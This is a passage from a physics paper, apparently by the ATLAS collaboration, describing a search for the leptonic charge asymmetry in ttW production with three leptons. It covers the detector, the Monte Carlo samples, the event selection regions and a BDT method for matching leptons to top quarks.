+ than in 𝑡¯𝑡 production [9, 10]. Furthermore, the 𝑊 boson present in 𝑡¯𝑡𝑊 production is typically radiated
112
+ from the initial 𝑞 ¯𝑞′ state and, therefore, serves as a polariser of the initial 𝑞 ¯𝑞′ state and in turn the final
113
+ 𝑡¯𝑡 state. This polarisation further enhances the asymmetry between the decay products of the top quarks
114
+ and top antiquarks. The prospects for experimental observation of these asymmetries are greatest in the
115
+ case of the charged leptons originating from the top-quark (antiquark) decays. This is due to the precision
116
+ with which the lepton kinematics can be reconstructed and the power with which reducible background
117
+ processes can be suppressed. The leptonic charge asymmetry (𝐴ℓ
118
+ c), in the following just referred to as
119
+ ‘charge asymmetry’, is defined analogously to Eq. (1), but based on the pseudorapidities of the leptons
120
+ from the top-quark and top-antiquark decays:
121
+ 𝐴ℓ
122
+ c = 𝑁 (Δ𝜂ℓ > 0) − 𝑁 (Δ𝜂ℓ < 0)
123
+ 𝑁 (Δ𝜂ℓ > 0) + 𝑁 (Δ𝜂ℓ < 0) ,
124
+ (2)
125
+ where Δ𝜂ℓ = |𝜂ℓ| − |𝜂 ¯ℓ| is the difference between the absolute pseudorapidities of the leptons that originate
126
+ from the top quark (|𝜂ℓ|) and top antiquark (|𝜂 ¯ℓ|), respectively.
127
+ Reference [9] gives a comparison of NLO QCD matrix elements (MEs) matched to parton shower (PS)
128
+ calculations of the top-quark-based and leptonic charge asymmetries of 𝑡¯𝑡 and 𝑡¯𝑡𝑊 production in the
129
+ full phase space at √𝑠 = 13 TeV. The charge asymmetry for 𝑡¯𝑡𝑊 is larger than for 𝑡¯𝑡 production at the
130
+ expense of a smaller cross-section for the process. In addition to being sensitive to BSM physics, such as
131
+ axigluons and Standard Model Effective Field Theory (SMEFT) scenarios corresponding to four-fermion
132
+ operators (examples given in Refs. [9] and [11]), charge asymmetry measurements have the potential to
133
+ discriminate between new physics signals with different chiral structures that would be indistinguishable
134
+ using only cross-section observables.
135
+ At the Tevatron, forward–backward asymmetries in 𝑡¯𝑡 production have been measured, with results found
136
+ to be in agreement with SM calculations that include higher-order corrections [12, 13]. The ATLAS and
137
+ CMS collaborations performed measurements of the top-quark-based charge asymmetry for 𝑡¯𝑡 production.
138
+ A combination of these ATLAS and CMS results at √𝑠 = 7 TeV and 8 TeV for the top-quark-based charge
139
+ asymmetry is reported in Ref. [14] and updated measurements have been published by ATLAS and CMS
140
+ using √𝑠 = 13 TeV data [15, 16]. The measurements reported by CMS in Ref. [17] include an extraction of
141
+ the leptonic charge asymmetry for 𝑡¯𝑡 production in a particle-level fiducial volume. A measurement of the
142
+ top-quark-based charge asymmetry for 𝑡¯𝑡 production in association with a photon has been reported by
143
+ ATLAS in Ref. [18]. None of these measurements show significant deviations from the SM expectations.
144
+ In Ref. [10], NLO QCD calculations of 𝐴ℓ
145
+ c have been performed including top-quark off-shell effects,
146
+ which also include the impact of different renormalisation and factorisation scale choices on 𝐴ℓ
147
+ c in the
148
+ multi-lepton channel at the LHC at √𝑠 = 13 TeV.2
149
+ This paper presents a search for the leptonic charge asymmetry in 𝑡¯𝑡𝑊 production using 𝑝𝑝 collision data
150
+ at √𝑠 = 13 TeV in the trilepton (3ℓ) channel with the full Run 2 data sample, corresponding to an integrated
151
+ 2 These results are given in terms of the rapidities of the leptons (𝐴ℓc,𝑦) and not the pseudorapidities.
152
+ 3
153
+
154
+ luminosity of 139 fb−1. The paper is organised as follows. Section 2 provides a brief description of the
155
+ ATLAS detector. In Section 3, the data sample as well as the simulated signal and background processes
156
+ are discussed. The reconstructed particle candidates are defined in Section 4. Section 5 gives an overview
157
+ of the event selection and of the definitions of the control and signal regions. The algorithm used to identify
158
+ reconstructed leptons originating from top quarks (antiquarks) is explained in Section 6. In Section 7, the
159
+ sources of systematic uncertainties that affect the search are discussed. The result for the charge asymmetry
160
+ measurement at reconstruction level is presented in Section 8. The unfolding procedure and the extraction
161
+ of the charge asymmetry at particle level are presented in Section 9. In Section 10, the conclusions are
162
+ drawn.
163
+ 2 The ATLAS detector
164
+ The ATLAS detector [19] at the LHC covers nearly the entire solid angle around the collision point. It
165
+ consists of an inner tracking detector surrounded by a thin superconducting solenoid, electromagnetic and
166
+ hadronic calorimeters, and a muon spectrometer incorporating three sets of large superconducting toroidal
167
+ magnets, each consisting of eight separate coils. The inner-detector system is immersed in a 2 T axial
168
+ magnetic field and provides charged-particle tracking in the range |𝜂| < 2.5.
169
+ The high-granularity silicon pixel detector covers the vertex region and typically provides four measurements
170
+ per track, with the first hit typically being detected in the insertable B-layer installed before Run 2 [20,
171
+ 21]. It is followed by the silicon microstrip tracker, which usually provides eight measurements per
172
+ track. These silicon detectors are complemented by the transition radiation tracker (TRT), which enables
173
+ radially extended track reconstruction up to |𝜂| = 2.5. The TRT also provides electron identification
174
+ information based on the fraction of hits above a higher energy-deposit threshold corresponding to transition
175
+ radiation. Typically, around 30 TRT hits are measured in total per track.
176
+ The calorimeter system covers the pseudorapidity range |𝜂| < 4.9. In the region |𝜂| < 3.2, electromagnetic
177
+ calorimetry is provided by barrel and endcap high-granularity lead/liquid-argon (LAr) calorimeters, with
178
+ an additional thin LAr presampler covering |𝜂| < 1.8 to correct for energy loss in material upstream of
179
+ the calorimeters. Hadronic calorimetry is provided by the steel/scintillator-tile calorimeter, segmented
180
+ into three barrel structures with |𝜂| < 1.7, and two copper/LAr hadronic endcap calorimeters. The solid
181
+ angle coverage is extended with forward copper/LAr and tungsten/LAr calorimeter modules optimised for
182
+ electromagnetic and hadronic measurements respectively.
183
+ The muon spectrometer comprises separate trigger and high-precision tracking chambers measuring the
184
+ deflection of muons in a magnetic field generated by the superconducting air-core toroids. The field integral
185
+ of the toroids ranges between 2.0 and 6.0 Tm across most of the detector. A set of precision chambers
186
+ covers the region |𝜂| < 2.7 with three layers of monitored drift tubes, complemented by cathode-strip
187
+ chambers in the forward region, where the background rates are highest. The muon trigger system covers
188
+ the range |𝜂| < 2.4 with resistive-plate chambers in the barrel, and thin-gap chambers in the endcap
189
+ regions.
190
+ Relevant events are selected to be recorded by the first-level trigger system implemented in custom hardware,
191
+ followed by selections made by algorithms implemented in software in the high-level trigger [22]. The
192
+ first-level trigger accepts events from the 40 MHz bunch crossings at a rate below 100 kHz, which the
193
+ high-level trigger reduces to record events to disk at about 1 kHz.
194
+ 4
195
+
196
+ An extensive software suite [23] is used in data simulation, in the reconstruction and analysis of real and
197
+ simulated data, in detector operations, and in the trigger and data acquisition systems of the experiment.
198
+ 3 Data and simulated event samples
199
+ The analysis is performed on data from 𝑝𝑝 collisions at √𝑠 = 13 TeV delivered by the LHC and recorded
200
+ by the ATLAS detector in the years 2015–2018. The bunch spacing for this data-taking period was 25 ns
201
+ with a typical number of 𝑝𝑝 interactions per bunch crossing (‘pile-up’) that varies by year and LHC beam
202
+ conditions and was in the range from 10 to 70 for almost all events. After requirements on the stability of
203
+ the beams, the operational status of all ATLAS detector components, and the quality of the recorded data,
204
+ the total integrated luminosity of the data sample corresponds to 139 fb−1. This value is derived from the
205
+ calibration of the luminosity scale using 𝑥–𝑦 beam-separation scans, following a methodology similar to
206
+ that detailed in Ref. [24], and using the LUCID-2 detector [25] for the baseline luminosity measurements.
207
+ Simulated Monte Carlo (MC) samples are used to model the contributions from the various SM processes.
208
+ The MC generators used for the hard-scattering, as well as the PS, underlying event and hadronisation, are
209
+ explained in the following. For some processes, in addition to the nominal simulation, alternative MC
210
+ samples are available that are used to evaluate the effects of different MC modelling uncertainties (see
211
+ Section 7.2). All MC samples were generated using a 25 ns bunch-spacing configuration.
212
+ The effect of pile-up was modelled by overlaying the hard-scattering event with simulated minimum-
213
+ bias events generated with Pythia 8.186 [26] using the NNPDF2.3lo [27] set of parton distribution
214
+ functions (PDFs) and the A3 set of tuned MC parameters [28]. Separate MC production campaigns were
215
+ used to model the different pile-up distributions observed in data for the years 2015/16, 2017 and 2018.
216
+ The simulated samples were reweighted to reproduce the observed distribution of the average number
217
+ of collisions per bunch crossing. The simulation of detector effects was performed with either a full
218
+ ATLAS detector simulation based on the Geant4 [29] framework or a fast simulation (AtlFast-II) using a
219
+ parameterisation of the performance of the electromagnetic and hadronic calorimeters and Geant4 for the
220
+ other detector components [30].
221
+ The signal process (𝑡¯𝑡𝑊) was simulated at NLO precision in QCD with Sherpa 2.2.10 [31] and the
222
+ NNPDF3.0nnlo PDF set [32]. In this set-up, multiple MEs were matched and merged with the Sherpa PS
223
+ model based on the Catani–Seymour dipole factorisation scheme [33, 34]. The virtual QCD corrections for
224
+ MEs at NLO accuracy were provided by the OpenLoops library [35, 36]. Up to one additional parton
225
+ was included in the NLO ME, and two, three or four additional partons were included at LO in QCD. The
226
+ merging scale parameter (𝜇q), which sets a threshold to determine what part of the phase-space is filled
227
+ by the PS or the ME generator, was set to an energy of 30 GeV. Additional partons beyond ME-level
228
+ accuracy and below the merging scale threshold were therefore described by the PS. The masses of the top
229
+ quark and the 𝑊 boson were set to 172.5 GeV and 80.4 GeV, respectively [37]. In addition to the nominal
230
+ prediction at NLO in QCD (order of 𝛼𝛼3
231
+ s ),3 higher-order corrections related to EW 𝑡¯𝑡𝑊 contributions were
232
+ also added as part of the signal definition. The 𝛼3 and 𝛼2𝛼2
233
+ s corrections were added through MC event
234
+ weights derived using the virtual additive corrections in the formalism described in Ref. [38].
235
+ An alternative 𝑡¯𝑡𝑊 sample uses MadGraph5_aMC@NLO 2.9.3 [39, 40] (in the following denoted by
236
+ MG5_aMC@NLO) for the ME and was interfaced to Pythia 8.245 [41] for the PS, underlying event
237
+ and hadronisation modelling. This sample was generated with the FxFx algorithm [42] with up to one
238
+ 3 𝛼 and 𝛼s denote the EW and strong coupling constants, respectively.
239
+ 5
240
+
241
+ additional parton at NLO accuracy and up to two additional partons at LO accuracy in QCD. The expected
242
+ accuracy of this sample is similar to that of the nominal Sherpa 2.2.10 sample. This multi-leg configuration
243
+ makes use of complex functional forms for the renormalisation and factorisation scales (𝜇r and 𝜇f) that are
244
+ chosen dynamically and depend on the kinematics of the event after the merging of the core process with
245
+ the additional partons following the FxFx merging prescription [42–44]. They depend on the phase-space
246
+ configuration and are related to the clustering scales of the additional partons and on the core process. The
247
+ merging scale parameter was set to 30 GeV. The sample was simulated using the NNPDF3.0nlo PDF set
248
+ and the A14 set of tuned MC parameters [45], henceforth referred to as the ‘A14 MC tune’. Top-quark
249
+ decays were simulated at LO using the MadSpin program [46, 47]. Further alternative 𝑡¯𝑡𝑊 samples were
250
+ simulated with the Powheg [48] generator providing ME calculations at NLO in 𝛼s with the NNPDF3.0nlo
251
+ PDF set and the A14 MC tune. These Powheg 𝑡¯𝑡𝑊 samples were interfaced either with Pythia 8.245
252
+ or with Herwig 7.2.1 [49–51] for the simulation of the PS, underlying event and hadronisation. All the
253
+ alternative 𝑡¯𝑡𝑊 samples were normalised to the same cross-section as the nominal Sherpa 2.2.10 sample in
254
+ order not to be sensitive to overall normalisation differences when comparing the two simulations.
255
+ The 𝑡¯𝑡𝑊 EW corrections at the order of 𝛼3𝛼s were simulated by an independent Sherpa 2.2.10 sample,
256
+ produced at LO in QCD with the same configuration as the nominal signal sample. Since the charge
257
+ asymmetry from these processes is negligible compared to the nominal signal contribution, this MC sample
258
+ is treated as a background in the analysis.
259
+ The production of a 𝑡¯𝑡 pair in association with a 𝑍 boson (𝑡¯𝑡𝑍) was simulated at NLO precision with
260
+ the MG5_aMC@NLO 2.8.1 generator for the ME and Pythia 8.244 for the PS, underlying event and
261
+ hadronisation, together with the NNPDF3.0nlo PDF set and the A14 MC tune. The mass of the 𝑍 boson
262
+ was set to 91.2 GeV [37]. The 𝑡¯𝑡𝛾∗ contribution and 𝑍/𝛾∗ interference effects were taken into account, with
263
+ the samples including events with dilepton invariant masses (𝑚ℓℓ) down to 1 GeV, where ℓ is an electron
264
+ or muon. Additional 𝑡¯𝑡𝑍 samples using MG5_aMC@NLO 2.8.1 for the ME, but Herwig 7.2.1 for the PS
265
+ along with the Herwig standard set of tuned parameters and the NNPDF3.0nlo PDF set were used for the
266
+ evaluation of systematic uncertainties associated with the PS and hadronisation. Further alternative 𝑡¯𝑡𝑍
267
+ samples with the same settings as the nominal samples, but using the A14 eigentune variation Var3c [45],
268
+ are used to evaluate the uncertainty associated with the initial-state radiation (ISR). Similarly to 𝑡¯𝑡𝑊, the
269
+ alternative 𝑡¯𝑡𝑍 samples were normalised to the same cross-section as the nominal sample.
270
+ The production of 𝑡¯𝑡, 𝑡¯𝑡𝐻 and 𝑡𝑊 events was simulated at NLO with the Powheg generator for the ME,
271
+ together with the NNPDF3.0nlo PDF set and the A14 MC tune. The ℎdamp parameter, which controls the
272
+ matching in Powheg and regulates the high-𝑝T radiation against which the 𝑡¯𝑡 system recoils, was set to
273
+ 1.5 times the nominal top-quark mass. The events were interfaced to Pythia 8.230 for the PS, underlying
274
+ event and hadronisation. The 𝑡¯𝑡 cross-section was normalised to next-to-next-to-leading-logarithmic
275
+ order (NNLL) in QCD, including the resummation of NNLL soft-gluon terms (NNLO + NNLL) [52,
276
+ 53]. The 𝑡¯𝑡𝐻 samples were normalised to NLO (QCD and EW) using the calculations documented in
277
+ Ref. [54]. The 𝑡𝑊 sample was normalised to NLO in QCD including NNLL soft-gluon corrections [55].
278
+ An alternative 𝑡¯𝑡 simulation was used with the same set-up for the ME, but the events were interfaced to
279
+ Herwig 7.1.3 [56] for the PS, underlying event and hadronisation modelling. The Herwig standard set of
280
+ tuned parameters and the NNPDF3.0nlo PDF set were used. Alternative 𝑡¯𝑡𝐻 samples were used, where
281
+ either the ME generator (MG5_aMC@NLO 2.6.0) or the PS algorithm (Herwig 7.2.1) was changed with
282
+ respect to the nominal 𝑡¯𝑡𝐻 simulation.
283
+ A MC sample featuring the production of 𝑡¯𝑡 events in association with photons (𝑡¯𝑡𝛾) was simulated at LO in
284
+ QCD with MG5_aMC@NLO 2.3.3 and interfaced to Pythia 8.212, together with the NNPDF3.0nlo PDF
285
+ 6
286
+
287
+ set and the A14 MC tune. This sample is, however, only used to assign an extra uncertainty to additional
288
+ photon radiation in the nominal 𝑡¯𝑡 prediction. Details of this procedure can be found in Section 7.2.
289
+ The production of a single top quark (or antiquark) in association with a 𝑍 boson and one extra parton (𝑡𝑍𝑞)
290
+ was simulated using the MG5_aMC@NLO 2.3.3 generator at NLO with the NNPDF3.0nnlo PDF set.
291
+ The events were interfaced to Pythia 8.245 using the A14 MC tune. The 𝑡𝑍𝑞 simulation also includes
292
+ off-shell 𝑍 boson decays into dilepton pairs with invariant masses in the range 𝑚ℓℓ > 5 GeV. Single top
293
+ quark (antiquark) production in association with both a 𝑊 and a 𝑍 boson (𝑡𝑊𝑍) was simulated at NLO
294
+ with MG5_aMC@NLO 2.2.2 and the NNPDF3.0nnlo PDF set, using Pythia 8.235 for the PS simulation.
295
+ The interference between 𝑡¯𝑡𝑍 and 𝑡𝑊𝑍 was removed following a diagram-removal (DR) approach referred
296
+ to as the ‘DR1 scheme’ [57].
297
+ The MC samples featuring 𝑍 + jets production were simulated at NLO with the Powheg generator for
298
+ the ME and interfaced to Pythia 8.186 for the PS. The AZNLO [58] set of tuned parameters and the
299
+ NNPDF3.0nnlo PDF set were used. An alternative 𝑍 + jets simulation was done with the Sherpa 2.2.11
300
+ generator where the default Sherpa PS set-up was used along with the NNPDF3.0nnlo PDF set. The
301
+ 𝑍 + jets samples feature events with 𝑚ℓℓ down to 10 GeV. The sample cross-sections were normalised to
302
+ NNLO predictions [59]. The Powheg + Pythia 8 sample used Photos [60] for final-state radiation (FSR).
303
+ For the simulation of 𝑍 boson production in association with a photon (𝑍𝛾), Sherpa 2.2.11 was used with
304
+ the NNPDF3.0nnlo PDF set. The events were simulated at NLO precision.
305
+ Diboson processes featuring the production of three charged leptons and one neutrino or four charged
306
+ leptons (denoted by 𝑊𝑍 + jets or 𝑍𝑍 + jets, respectively) were simulated using the Sherpa 2.2.2 generator,
307
+ with a similar set-up to that described for 𝑍 + jets. Events with up to one extra parton were simulated
308
+ at NLO, and with two or three partons at LO precision. MC samples featuring Higgs boson production
309
+ in association with a 𝑊 or 𝑍 boson (𝐻 +𝑊/𝑍) were generated at NLO using Powheg interfaced to
310
+ Pythia 8.230/8.235 for the PS, together with the NNPDF3.0nlo PDF set and the AZNLO MC tune.
311
+ The production of four top quarks (𝑡¯𝑡𝑡¯𝑡) was modelled at NLO with Sherpa 2.2.11 together with the
312
+ NNPDF3.0nnlo PDF set. The production of three top quarks (𝑡𝑡¯𝑡) and the production of a 𝑡¯𝑡 pair with two
313
+ 𝑊 bosons (𝑡¯𝑡𝑊𝑊) were simulated at LO using MG5_aMC@NLO 2.2.2 interfaced to Pythia 8.186 with
314
+ the A14 MC tune and the NNPDF2.3lo PDF set. Fully leptonically decaying triboson processes (𝑊𝑊𝑊,
315
+ 𝑊𝑊𝑍, 𝑊𝑍𝑍 and 𝑍𝑍𝑍) with up to six leptons in the final states were simulated with Sherpa 2.2.2 and the
316
+ NNPDF3.0nlo PDF set. Final states with no additional partons were calculated at NLO, whereas final
317
+ states with one, two or three additional partons were calculated at LO.
318
+ For all MC samples except the Sherpa ones, the decays of 𝑏- and 𝑐-hadrons were simulated using the
319
+ EvtGen 1.2.0 program [61].
320
+ 4 Event reconstruction
321
+ Electron candidates are reconstructed from clusters of energy deposits in the electromagnetic calorimeter
322
+ that are matched to tracks in the inner detector. They are required to satisfy 𝑝T > 10 GeV, |𝜂| < 2.47
323
+ and need to pass a ‘Tight’ working point (WP), defined by a likelihood-based electron identification (ID)
324
+ requirement [62]. To reject non-prompt electrons, the reconstructed track associated with the electron must
325
+ satisfy the requirements |𝑧0 sin(𝜃)| < 0.5 mm and |𝑑0|/𝜎(𝑑0) < 5, where 𝑧0 describes the longitudinal
326
+ 7
327
+
328
+ impact parameter relative to the reconstructed primary vertex,4 𝑑0 is the transverse impact parameter
329
+ relative to the beam axis, and 𝜎(𝑑0) is the uncertainty in 𝑑0. Electron candidates are excluded if their
330
+ calorimeter energy clusters lie within 1.37 < |𝜂| < 1.52, the transition region between the barrel and the
331
+ endcap of the electromagnetic calorimeter.
332
+ Additional requirements are applied to the electron candidates to suppress the contribution of electrons
333
+ originating from converted photons (𝛾-conversions). Electrons can be identified as internal- or material-
334
+ conversion candidates by checking for additional tracks close to the calorimeter energy clusters associated
335
+ with the electrons and the existence of conversion vertices. Electrons that are identified as either internal-
336
+ or material-conversion candidates are rejected. These requirements are referred to in the following as ‘𝑒/𝛾
337
+ ambiguity requirements’.
338
+ Furthermore, the electrons selected for the signal regions (SRs) of the analysis have to satisfy an isolation
339
+ requirement. An isolation WP is defined using a multivariate likelihood discriminant that combines
340
+ electromagnetic shower shapes and track information from the inner detector to distinguish prompt electrons
341
+ from non-prompt/fake electrons originating from hadronic jets, 𝛾-conversions and heavy-flavour hadron
342
+ decays. The electrons satisfying the isolation requirements are henceforth referred to as tight electrons,
343
+ whereas loose electrons are defined by the conditions listed in the previous paragraph and do not need to
344
+ satisfy the isolation requirement.
345
+ Muon candidates have to satisfy 𝑝T > 10 GeV, |𝜂| < 2.5 and an ID selection, corresponding to a ‘Medium’
346
+ WP. This sets requirements on the number of hits in the different inner detector and muon spectrometer
347
+ subsystems and on the significance of the charge-to-momentum ratio (𝑞/𝑝) [63, 64]. If a muon has
348
+ insufficient momentum resolution, the entire event is removed. Requirements on the impact parameters of
349
+ the reconstructed track associated with the muon candidate are applied to reject non-prompt muons. The
350
+ track is required to have |𝑧0 sin(𝜃)| < 0.5 mm and |𝑑0|/𝜎(𝑑0) < 3.
351
+ As with electrons, an isolation requirement is applied to the muons used in the SRs, using the same approach
352
+ based on a multivariate likelihood discriminant to distinguish prompt muons from non-prompt/fake muons.
353
+ Muons are referred to as tight or loose, depending on whether or not they satisfy this isolation requirement
354
+ in addition to the criteria listed above.
355
+ Jets are reconstructed using the anti-𝑘𝑡 jet algorithm [65] on particle-flow objects [66] with the radius
356
+ parameter set to 𝑅 = 0.4, as implemented in the FastJet package [67]. The anti-𝑘𝑡 algorithm is used to
357
+ reconstruct jets with a four-momentum recombination scheme, using the particle-flow objects as inputs.
358
+ The jet calibration is performed using a standard procedure that corrects the jet energy to match, on average,
359
+ the particle-level jet energy in simulation and applies an in situ correction for data [68]. To suppress jets
360
+ from additional 𝑝𝑝 interactions within the same bunch crossing, a ‘jet vertex tagger’ (JVT) [69, 70] is
361
+ applied to select jets. The jets are only kept if they have 𝑝T > 20 GeV and are in a pseudorapidity range of
362
+ |𝜂| < 2.5. In addition, JVT > 0.2 is required for jets with 𝑝T < 60 GeV and |𝜂| < 2.4, corresponding to a
363
+ ‘Medium’ JVT WP.
364
+ The selection of jets containing 𝑏-hadrons (‘𝑏-tagging’) is performed with a multivariate deep-learning
365
+ algorithm referred to as DL1r [71, 72]. A selection that provides a 77% efficiency for identifying jets
366
+ containing 𝑏-hadrons (‘𝑏-jets’) in simulated 𝑡¯𝑡 events, with a rejection factor of 130 against light-flavour
367
+ jets and of five against jets containing 𝑐-hadrons, is used.
368
+ 4 The primary vertex is defined as the vertex (at least two associated tracks with 𝑝T > 500 MeV) with the highest scalar sum of
369
+ the squared transverse momenta of the associated tracks.
370
+ 8
371
+
372
+ Associated scale factors are applied as multiplicative factors to the MC event weights, to correct for
373
+ the mis-modelling of efficiencies associated with the reconstruction, identification, isolation and trigger
374
+ selection of electrons and muons, as well as the JVT and 𝑏-tagging selection for jets.
375
+ The missing transverse momentum is defined as the negative vector sum of the transverse momenta of
376
+ all selected and calibrated particle candidates (electrons, muons and jets). Low-momentum tracks from
377
+ the primary vertex that are not associated with any of the reconstructed particle candidates described
378
+ previously are also included as a ‘soft term’ in the calculation [73]. The magnitude of the missing transverse
379
+ momentum vector is denoted by 𝐸miss
380
+ T
381
+ .
382
+ Ambiguities between independently reconstructed electrons, muons and jets can arise. A sequential
383
+ procedure, referred to as ‘overlap removal’, is performed to resolve these ambiguities and, thus, avoids double
384
+ counting of particle candidates. It is applied as follows. if an electron candidate and a muon candidate share a
385
+ track, the electron candidate is removed. Jet candidates within a distance of Δ𝑅𝑦,𝜙 =
386
+ √︁
387
+ (Δ𝑦)2 + (Δ𝜙)2 = 0.2
388
+ from a remaining electron candidate are discarded. If multiple jets are found in this area, only the closest
389
+ jet is removed. If the electron–jet distance is between 0.2 and 0.4, the electron candidate is removed. If the
390
+ Δ𝑅𝑦,𝜙 between any remaining jet and a muon candidate is less than 0.4, the muon candidate is removed if
391
+ the jet has more than two associated tracks, otherwise, the jet is discarded.
392
+ 5 Event selection and definitions of control and signal regions
393
+ Events were selected with either single-lepton or dilepton (dielectron, dimuon and electron–muon) triggers
394
+ with their minimum 𝑝T thresholds varying from 12 to 26 GeV, depending on the lepton flavour, the trigger
395
+ type and the data-taking period [74, 75]. A logical ‘OR’ between the triggers was applied. Only events
396
+ with exactly three charged light leptons (electrons or muons), as defined in Section 4, are selected. If
397
+ additional tight electrons or muons are found in the event, the event is rejected. The transverse momenta
398
+ of the three charged leptons have to be larger than 30, 20 and 15 GeV for the leading, sub-leading and
399
+ third lepton, respectively. A geometrical matching between the selected leptons found in the event and the
400
+ ones reconstructed by the trigger algorithms is required. Furthermore, the 𝑝T of the lepton that fires a
401
+ trigger needs to be above the 𝑝T threshold of the respective trigger to ensure that the trigger is maximally
402
+ efficient.
403
+ The selected events are classified into four SRs, depending on their jet and 𝑏-jet multiplicities, as well as
404
+ their 𝐸miss
405
+ T
406
+ . In addition, four control regions (CRs) are defined to constrain the dominant backgrounds in
407
+ the simultaneous fit to extract the result. In 𝑡¯𝑡𝑊 production with three charged leptons in the final state,
408
+ two jets originated from 𝑏-quarks are expected from the hard-process. However, additional jet activity due
409
+ to gluon radiation and showering effects can occur. Thus, events are split into ‘low-𝑁jets’ regions with two
410
+ or three jets and ‘high-𝑁jets’ with at least four jets.
411
+ The definitions of the SRs and CRs are summarised in Table 1. The sum of the three lepton charges must
412
+ be ±1. A requirement that the invariant mass of the opposite-sign–same-flavour lepton pair (𝑚OSSF
413
+ ℓℓ
414
+ ) be at
415
+ least 30 GeV is applied to remove the contributions from low-mass lepton resonances (e.g. 𝐽/𝜓 → ℓ+ℓ−).
416
+ The number of 𝑍 boson candidates (𝑁𝑍-cand.) is defined by the number of OSSF lepton pairs found in
417
+ the event that have an invariant mass in the range [𝑚𝑍 − 10 GeV, 𝑚𝑍 + 10 GeV]. Exactly one 𝑍 boson
418
+ candidate is required for the CR for the 𝑡¯𝑡𝑍 background, but zero for all the other regions. The CRs targeting
419
+ non-prompt electron/muons arising from heavy-flavour (HF) hadron decays (CR-HF𝑒 and CR-HF𝜇) are
420
+ separated by the flavour of the third lepton. The third lepton must fail the isolation requirements in order to
421
+ 9
422
+
423
+ enrich these regions with HF leptons. The CR for 𝛾-conversions (CR-𝛾-conv) requires at least one of the
424
+ leptons to be an electron candidate that fails the 𝑒/𝛾 ambiguity requirements defined in Section 4. The
425
+ contribution from electrons with misidentified electric charge has been studied in MC and found to be
426
+ negligible in the SRs.
427
+ Although the SR with two 𝑏-jets and low jet multiplicity (SR-2𝑏-low𝑁jets) is the most sensitive to 𝑡¯𝑡𝑊
428
+ production, the best result can be obtained from a statistical combination of all SRs and CRs (see
429
+ Section 8).
430
+ Table 1: Summary of the requirements applied to define the signal and control regions of the analysis. 𝑁jets includes
431
+ 𝑏-tagged and non-𝑏-tagged jets. The labels ‘T’ and ‘T’ refer to tight leptons that satisfy all selection requirements
432
+ described in Section 4 (T) and loose leptons that fail to satisfy the isolation requirements (T).
433
+ Preselection
434
+ 𝑁ℓ (ℓ = 𝑒/𝜇)
435
+ = 3
436
+ 𝑝ℓ
437
+ T (1st/2nd/3rd)
438
+ ≥ 30 GeV, ≥ 20 GeV, ≥ 15 GeV
439
+ Sum of lepton charges
440
+ ±1
441
+ 𝑚OSSF
442
+ ℓℓ
443
+ ≥ 30 GeV
444
+ Region-specific requirements
445
+ SR-1𝒃-low𝑵jets
446
+ SR-1𝒃-high𝑵jets
447
+ SR-2𝒃-low𝑵jets
448
+ SR-2𝒃-high𝑵jets
449
+ 𝑁jets
450
+ [2, 3]
451
+ ≥ 4
452
+ [2, 3]
453
+ ≥ 4
454
+ 𝑁𝑏-jets
455
+ = 1
456
+ = 1
457
+ ≥ 2
458
+ ≥ 2
459
+ 𝐸miss
460
+ T
461
+ ≥ 50 GeV
462
+ ≥ 50 GeV
463
+
464
+
465
+ 𝑁𝑍-cand.
466
+ = 0
467
+ Lepton criteria
468
+ TTT
469
+ 𝑒/𝛾 ambiguity-cuts
470
+ satisfy all
471
+ CR-𝒕¯𝒕𝒁
472
+ CR-HF𝒆
473
+ CR-HF𝝁
474
+ CR-𝜸-conv
475
+ ℓ1st/2nd/3rd
476
+ ℓℓℓ
477
+ ℓℓ𝑒
478
+ ℓℓ𝜇
479
+ ℓℓ𝑒, ℓ𝑒ℓ, 𝑒ℓℓ
480
+ 𝑁jets
481
+ ≥ 4
482
+ ≥ 2
483
+ ≥ 2
484
+ ≥ 2
485
+ 𝑁𝑏-jets
486
+ ≥ 2
487
+ = 1
488
+ = 1
489
+ ≥ 1
490
+ 𝐸miss
491
+ T
492
+
493
+ < 50 GeV
494
+ < 50 GeV
495
+ < 50 GeV
496
+ 𝑁𝑍-cand.
497
+ = 1
498
+ = 0
499
+ = 0
500
+ = 0
501
+ Lepton criteria
502
+ TTT
503
+ TTT
504
+ TTT
505
+ TTT
506
+ 𝑒/𝛾 ambiguity-cuts
507
+ satisfy all
508
+ satisfy all
509
+ satisfy all
510
+ ≥ 1 fail
511
+ 6 Lepton–top-quark matching
512
+ In the 𝑡¯𝑡𝑊 process, the leptonic charge asymmetry is calculated only from the charged leptons that originate
513
+ from the top quark and top antiquark. Since this search targets events with three charged leptons, a
514
+ problem arises when selecting the two leptons used to calculate the difference between their absolute
515
+ pseudorapidities (Δ𝜂ℓ) and ultimately the 𝐴ℓ
516
+ c value (as defined in Eq. (2)). The leptons that originate from
517
+ a 𝑡¯𝑡 pair always have opposite-sign charges. In a 𝑡¯𝑡𝑊 event with three charged leptons, the two leptons with
518
+ 10
519
+
520
+ the same charge cannot both come from the 𝑡¯𝑡 pair and will always contain one lepton from a top-quark or
521
+ top-antiquark decay and one lepton from the decay of the 𝑊 boson produced in association with the 𝑡¯𝑡 pair.
522
+ This same-sign pair of leptons is henceforth referred to as the ‘even’ leptons. The remaining lepton with
523
+ opposite charge, referred to as the ‘odd’ lepton, will always originate from a top quark or top antiquark.
524
+ The problem of selecting the two leptons from top quark or top-antiquark decays is hence reduced to
525
+ selecting one of the even leptons to calculate Δ𝜂ℓ.
526
+ This problem is addressed using a boosted decision tree (BDT) classifier algorithm that computes a
527
+ discriminator value for each even lepton in each event. Large discriminator values correspond to large
528
+ probabilities that a given lepton originated from a top-quark decay. The lepton with the highest BDT
529
+ discriminator score is selected to calculate Δ𝜂ℓ. The Δ𝜂ℓ values calculated with the selected lepton and
530
+ the odd lepton are denoted by Δ𝜂ℓ
531
+ BDT. Five input variables that each discriminate between leptons from
532
+ top-quark or top-antiquark decays and leptons from associated 𝑊 boson decays are defined. They are the
533
+ masses of the two systems formed from the lepton and the closest and second closest 𝑏-jets, as well as the
534
+ angular distances between the lepton and these 𝑏-jets: 𝑚ℓ𝑏0, 𝑚ℓ𝑏1, Δ𝑅ℓ𝑏0, Δ𝑅ℓ𝑏1. The last variable is the
535
+ lepton 𝑝T. For events with only one 𝑏-tagged jet, if any of the remaining jets pass a looser DL1r WP with
536
+ respect to the default selection described in Section 4, the jet with the highest DL1r score is selected. If
537
+ none of the other jets pass any 𝑏-tagging WP, the variables are constructed with the closest untagged jet.
538
+ The training of the classifier is performed using the nominal 𝑡¯𝑡𝑊 Sherpa MC sample. The BDT classifier
539
